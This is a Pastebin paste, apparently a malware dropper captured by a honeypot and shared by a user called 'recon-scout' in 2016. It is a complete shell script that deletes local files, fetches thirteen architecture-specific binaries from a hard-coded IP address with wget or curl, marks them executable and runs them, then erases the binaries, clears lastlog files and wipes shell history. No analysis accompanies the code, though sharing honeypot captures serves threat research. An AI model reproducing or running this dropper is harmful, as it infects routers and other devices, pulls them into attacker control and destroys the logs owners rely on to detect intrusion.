Advertisement
recon-scout

Honeypot Payload! Seen on: 2016-05-28 22:57

May 28th, 2016
146
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 1.45 KB | None | 0 0
  1. #!/bin/sh
  2.  
  3. # Delete any current files, because not all routers have much storage space
  4. rm -f *
  5.  
  6. # Wget/cURL our binaries
  7. wget -q http://188.209.52.176/one || curl -s -O http://188.209.52.176/one
  8. wget -q http://188.209.52.176/two || curl -s -O http://188.209.52.176/two
  9. wget -q http://188.209.52.176/three || curl -s -O http://188.209.52.176/three
  10. wget -q http://188.209.52.176/four || curl -s -O http://188.209.52.176/four
  11. wget -q http://188.209.52.176/five || curl -s -O http://188.209.52.176/five
  12. wget -q http://188.209.52.176/six || curl -s -O http://188.209.52.176/six
  13. wget -q http://188.209.52.176/seven || curl -s -O http://188.209.52.176/seven
  14. wget -q http://188.209.52.176/eight || curl -s -O http://188.209.52.176/eight
  15. wget -q http://188.209.52.176/nine || curl -s -O http://188.209.52.176/nine
  16. wget -q http://188.209.52.176/ten || curl -s -O http://188.209.52.176/1ten
  17. wget -q http://188.209.52.176/eleven || curl -s -O http://188.209.52.176/eleven
  18. wget -q http://188.209.52.176/twelve || curl -s -O http://188.209.52.176/twelve
  19. wget -q http://188.209.52.176/thirteen || curl -s -O http://188.209.52.176/thirteen
  20.  
  21. # Set file permissions
  22. chmod 777 *
  23.  
  24. # Run correct binary for current architecture
  25. ./one || ./two || ./three || ./four || ./five || ./six || ./seven || ./eight || ./nine || ./ten || ./eleven || ./twelve || ./thirteen
  26.  
  27. # Delete our files
  28. rm -f *
  29.  
  30. # Clear up
  31. >/var/log/lastlog
  32. >/etc/lastlog
  33. rm -f ~/.bash_history
  34. history -c
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement